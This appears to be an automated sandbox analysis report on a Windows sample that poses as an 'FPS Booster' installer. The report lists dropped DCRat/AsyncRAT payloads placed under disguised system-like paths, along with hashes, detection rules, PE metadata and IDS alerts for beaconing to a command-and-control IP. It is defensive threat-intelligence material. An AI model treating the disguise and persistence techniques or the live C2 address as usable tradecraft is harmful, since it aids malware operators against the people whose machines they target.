                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                          C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):440224
                                          Entropy (8bit):7.575534082136887
                                          Encrypted:false
                                          SSDEEP:6144:K50gUCEhptn640MJU1UUDkGdOcVb5HLw2+bNracddmVfdEDtO6zaZM+wo0fsLsNB:c0g8PQHE1HmVfdMFCjwo00+51f
                                          MD5:74BE806E27A351565F2EC136DCB5232C
                                          SHA1:0EC9FC48C5C290014958C05940BC340EED942E15
                                          SHA-256:33B5E6FF81C482B3B62F8ED847FD25E39724DC6EB6C2A3881B1004DC75C170B6
                                          SHA-512:0ECE93924E569718EB7DCA19474F2CDE1199BAC8EAD206A01A65DCF33E7718FCC7C668D6D891DD164F011AE9FB53272003BBC5DB54EBE6DE62C3B01D4986DD4D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.................................^1....@.................................@........@...W............... ...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...P...............................rsrc....W...@...X..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dll

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11264
                                          Entropy (8bit):5.729426875863261
                                          Encrypted:false
                                          SSDEEP:192:0N2gQuUwXzioj4KALV2upWzVd7q1QDXEbBZ8KxHdGzyS/Kx:rJoiO8V2upW7vQjS/
                                          MD5:BF712F32249029466FA86756F5546950
                                          SHA1:75AC4DC4808AC148DDD78F6B89A51AFBD4091C2E
                                          SHA-256:7851CB12FA4131F1FEE5DE390D650EF65CAC561279F1CFE70AD16CC9780210AF
                                          SHA-512:13F69959B28416E0B8811C962A49309DCA3F048A165457051A28A3EB51377DCAF99A15E86D7EEE8F867A9E25ECF8C44DA370AC8F530EEAE7B5252EABA64B96F4
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..............]..............XP......Xd......XU......XS.....Rich............PE..L.....GO...........!................('.......0...............................`............@..........................3.......1..P............................P.......................................................0..\............................text...1........................... ..`.rdata.......0......."..............@..@.data...@....@.......&..............@....reloc..L....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\nss20C1.tmp\modern-wizard.bmp

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                          File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                          Category:dropped
                                          Size (bytes):26494
                                          Entropy (8bit):1.9568109962493656
                                          Encrypted:false
                                          SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                          MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                          SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                          SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                          SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                          Malicious:false
                                          Preview:BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                                          C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):9728
                                          Entropy (8bit):5.115973604853638
                                          Encrypted:false
                                          SSDEEP:192:SbEunjqjIcESwFlioU3M0LLF/t8t9pKSfOi:SbESjFCw6oWPFl8jfOi
                                          MD5:4CCC4A742D4423F2F0ED744FD9C81F63
                                          SHA1:704F00A1ACC327FD879CF75FC90D0B8F927C36BC
                                          SHA-256:416133DD86C0DFF6B0FCAF1F46DFE97FDC85B37F90EFFB2D369164A8F7E13AE6
                                          SHA-512:790C5EB1F8B297E45054C855B66DFC18E9F3F1B1870559014DBEFA3B9D5B6D33A993A9E089202E70F51A55D859B74E8605C6F633386FD9189B6F78941BF1BFDB
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q+.v.J.%.J.%.J.%.2.%.J.%.J.%"J.%..5%.J.%...%.J.%...%.J.%...%.J.%Rich.J.%........PE..L.....GO...........!.........................0...............................p............@......................... 7..k....2.......P.......................`.......................................................0...............................text............................... ..`.rdata.......0......................@..@.data...0....@......................@....rsrc........P....... ..............@..@.reloc..N....`......."..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Windows\SysWOW64\MsRdpWebAccess\ee201eac4591f0b16735de891f3d31be299085b8

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):56
                                          Entropy (8bit):5.110577243331644
                                          Encrypted:false
                                          SSDEEP:3:bMj9dOtddcwKHgLnT1:2mjK+n5
                                          MD5:929FE3664F372034A4B03360129BEC57
                                          SHA1:CDF68EF39D5BDB7F85C82A9E12122C806291A0EB
                                          SHA-256:0FBBFBE1931094F2EB8CBDA041F8FD69AC33B07728D44CD8BEEC8DED8A492BEF
                                          SHA-512:558405B57190094C9987A6323DB4CC22E355CADBB4780C25FF6A632F49A7BA227299E6B20AC126B6412E6C25E6C32E337D84C7F03C4D3C14E431CC2EF47ABABC
                                          Malicious:false
                                          Preview:lJoOilyxhqi7rMeJ0EP7FWx8HQuVbaJgVsE98FCw5SUamME1X9kgBi7P

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.394317244435007
                                          Encrypted:false
                                          SSDEEP:6144:fl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNA9OBSqa:d4vF0MYQUMM6VFYS9U
                                          MD5:16A7B6CB8F23A4CF2037F1EF97AF47DB
                                          SHA1:C457EA2B19750CA7A85F1259345CC2ECE6CAE588
                                          SHA-256:469B519CC56D048E8D784A06706653F9786C924E9DC7B48463439A9937C30239
                                          SHA-512:62A251A6D74431B0DE2F40228CB0D908EBBBA92085B90292A3C26DA4D24DAB94CF38FC1B88B47AD241D5AE0A465B108A21992F79F0018E3C70DEBEE4C2832ECF
                                          Malicious:false
                                          Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB.z.x@................................................................................................................................................................................................................................................................................................................................................m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Windows\regedit\7a0fd90576e08807bde2cc57bcf9854bbce05fe3

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):160
                                          Entropy (8bit):5.555792510520905
                                          Encrypted:false
                                          SSDEEP:3:SUU6s1g3jjl9BHg1jrWAIYxwsDG1C0XddWd8hghd7c7YiuGCNqJ0R:SUi1y/m1jr7IYpGTXdY82s7YHL8J0R
                                          MD5:904A977536AC285CF9DA8B24858365FF
                                          SHA1:59F5E309C1D2A3E40EBB92DF3D537A9CDA0E2FFF
                                          SHA-256:DA61F7E1AA992F473F6A1F57B4E906613B0620910AA73DBFE3C02F9DE4CC909D
                                          SHA-512:2439B4183A1E3227B828EB5032AD69D04BF742E17AA1B0B9CEE724406DF742D3ADB5F9D316A69F789710A999BBF0052D2D2261ED220EF987802164915EAC4A13
                                          Malicious:false
                                          Preview:xXzgWbqX8MMO2SkgPERxDlMYrZaNEdXzdkl7xfYPFKvn0qBP9AulgvFMKay7BcSezXvSrmtupCr3zjhBYKODtwSreZxWqbOn1Qxd4tiWR95eEMWk3wi0OPvDEDxRzXDNyDCiwDHpm1wt0ynSDMc43XZlfuZ15Qh4

                                          C:\Windows\regedit\explorer.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.801535722709987
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:UNFOT5F1qt.exe
                                          File size:1'131'531 bytes
                                          MD5:1c40d9e61fbbd5d9054638b98b10e1cf
                                          SHA1:145119e649cabc6c60200643b3cc347fc4b164cc
                                          SHA256:854b586f8d0cad52a042ccee32691dc9c30e6a32bd3805024934f43e169325af
                                          SHA512:970eade0dce9dfaf5acdaf88721e55071fc48c4570c9a9b78c875d81fba54b047aed93412e331466a461662e065020f189b1dc1ec324b9394dd531ab2e3b3cf1
                                          SSDEEP:24576:TE9h8YY4mB7WnMSTdTvX+5pdKj30HZQHEGP:TeGYDmBcBpvEpdKj3W/i
                                          TLSH:553501499BAE8639CE7D1EB4F21114184AB2AE26E095E3C4DEDDB6ED4533784CC31237
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.gq..........a.... ........@.. ....................................`................................

                                          File Icon

                                          Icon Hash:46c98dc446623245

                                          Static PE Info

                                          General

                                          Entrypoint:0x4e9161
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xE61CCFF4 [Sat May 3 10:12:04 2092 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Authenticode Signature

                                          Signature Valid:
                                          Signature Issuer:
                                          Signature Validation Error:
                                          Error Number:
                                          Not Before, Not After
                                            Subject Chain
                                              Version:
                                              Thumbprint MD5:
                                              Thumbprint SHA-1:
                                              Thumbprint SHA-256:
                                              Serial:

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xe905c0x4a.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x2cd48.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xefc000x1270.rsrc
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xe90a60x38.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xe71670xe720039f6b20fe9c32911bf9330e3aead9ca1False0.9104372295835587PGP symmetric key encrypted data - Plaintext or unencrypted data7.874259568369085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xea0000x2cd480x2ce007a3386583914fe3ce52d18a7b66a0189False0.4698435323816156data6.865694273270142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1180000xc0x200ee3c2191b84ea0ab4f6f399ed7978f51False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              IBC0xea2440x7cf6data0.619849953110347
                                              RT_ICON0xf1f3c0xc46dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0005170527990455
                                              RT_ICON0xfe3ac0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.1391074174849166
                                              RT_ICON0x10ebd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.15050779404818138
                                              RT_ICON0x112dfc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.16919087136929462
                                              RT_ICON0x1153a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.22467166979362102
                                              RT_ICON0x11644c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.3829787234042553
                                              RT_GROUP_ICON0x1168b40x5adata0.7333333333333333
                                              RT_VERSION0x1169100x438dataEnglishUnited States0.48148148148148145

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-27T04:02:07.712551+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949723188.120.228.20380TCP
                                              2024-11-27T04:02:17.428898+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949746188.120.228.20380TCP
                                              2024-11-27T04:02:25.553488+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949767188.120.228.20380TCP
                                              2024-11-27T04:02:33.366043+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949785188.120.228.20380TCP
                                              2024-11-27T04:02:42.961482+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949806188.120.228.20380TCP
                                              2024-11-27T04:02:51.179051+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949827188.120.228.20380TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 27, 2024 04:02:06.178472996 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:06.298363924 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:06.298496962 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:06.299420118 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:06.419374943 CET8049723188.120.228.203192.168.2.9
